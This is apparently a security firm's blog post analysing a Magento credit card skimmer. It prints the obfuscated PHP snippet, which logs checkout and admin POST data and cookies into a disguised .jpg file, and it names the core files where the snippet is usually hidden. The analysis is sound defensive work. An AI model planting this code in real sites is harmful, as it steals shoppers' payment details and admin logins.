Home Testimonials Company Support 1–888–873–0817
Home Notes Malware Signatures About

We are often seeing malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eyes as it was a bit different from the others on how the information was collected and stored.

Usually, the attacker send all the sensitive information via e-mail but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);

Basically, this code writes all the requests that contain one these words in the URL:"admin|payment|order|saveOrder|onepage|checkout" to a file located in "/media/catalog/product/2/1/21_1.jpg".

As you can imagine at this point, the customer's credit card details and admin's login are now available for download.

The data is encoded and serialized inside the file "21_1.jpg" but after revert these steps you'll see something like this:

[payment] => Array
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048

Among other data, you'll see admin passwords, customer data and credit card details. It's quite scary realize that all these information is being stolen and attackers are continually changing their methods to keep undetected.

This particularly code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php" but other files may be affected. We recommend check constantly the core files for any change and keep all the software updated. Also, for obvious reasons, it's incredibly important change the password for all the admin users to avoid re-infections.

Finally, If you need a professional help, you can always count on us.